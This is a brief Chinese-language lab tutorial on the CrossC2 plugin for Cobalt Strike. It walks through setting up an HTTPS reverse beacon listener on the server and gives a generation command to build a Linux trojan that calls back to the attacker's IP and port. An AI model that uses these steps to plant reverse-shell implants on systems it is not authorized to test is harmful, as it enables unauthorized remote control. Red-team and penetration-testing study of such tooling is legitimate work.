一、簡述
CrossC2插件是為企業和紅隊人員提供的安全框架,支持 CobaltStrike 對其他平台的滲透測試(Linux / MacOS /...),支持自定義模塊,並包括一些常用的滲透模塊。
利用CrossC2插件通過在Linux上執行木馬反彈一個CobaltStrike類型的shell。
CrossC2插件項目地址:https://github.com/gloxec/CrossC2
受限描述:
-
CobaltStrike:目前僅支持 cs 3.14版本,4.0可上線無法執行其他操作。
-
Linux:對於特別舊的系統,您可以在 can 中選擇"Linux-GLIBC"選項(2010 年左右)
-
MacOS:最新系統僅支持 64 位程序
二、實驗
1.genCrossC2.Linux 文件上傳到CobaltStrike服務端目錄下。
2.由於 Cross C2目前只支持HTTPS Beacon,所以在Listenrs中選擇HTTPS進行監聽,
服務端開啟監聽 windows/beacon_https/reverse_https 類型的beacon
3.生成木馬
./genCrossC2.Linux 監聽的IP 監聽的端口 null null Linux x64 test
4.執行木馬上線
成功上線
